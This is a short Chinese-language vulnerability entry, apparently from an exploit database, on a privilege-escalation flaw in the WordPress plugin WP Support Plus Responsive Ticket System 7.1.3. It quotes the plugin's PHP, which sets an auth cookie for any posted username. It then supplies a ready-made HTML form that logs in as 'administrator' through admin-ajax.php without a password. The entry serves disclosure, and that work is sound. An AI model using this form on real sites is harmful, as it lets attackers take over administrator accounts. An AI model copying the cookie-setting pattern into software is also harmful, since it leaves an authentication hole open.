WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 -特权提升

### 漏洞插件地址 https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/ ### 漏洞说明 你可以登录任何人的账号，无需知道密码。这个漏洞是由于错误的使用wp_set_auth_cookie()导致的。 文件：wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php ``` <?php if($_POST['email']=='') die(); $user_id = username_exists( $_POST['username'] ); if(!$user_id){ $user_id=email_exists($_POST['email']); if(!$user_id){ $random_password = wp_generate_password( $length=12, $include_standard_special_chars=false ); $user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] ); $full_name=explode(' ', $_POST['name']); $firstName=(isset($full_name[0]))?$full_name[0]:''; $lastName=(isset($full_name[1]))?$full_name[1]:''; wp_update_user( array( 'ID' => $user_id, 'first_name'=>$firstName, 'last_name'=>$lastName, 'display_name' => $_POST['name'], 'role' => 'subscriber' ) ); } } $user_info = get_userdata($user_id); if ( !is_user_logged_in() ) { wp_set_current_user( $user_id, $user_info->user_login ); wp_set_auth_cookie( $user_id ); do_action( 'wp_login', $user_info->user_login ); } ?> ``` ### 漏洞证明 使用下面的表单： ``` <form method="post" action="http://wp/wp-admin/admin-ajax.php"> Username: <input type="text" name="username" value="administrator"> <input type="hidden" name="email" value="sth"> <input type="hidden" name="action" value="loginGuestFacebook"> <input type="submit" value="Login"> </form> ``` 你就可以进入管理员面板了。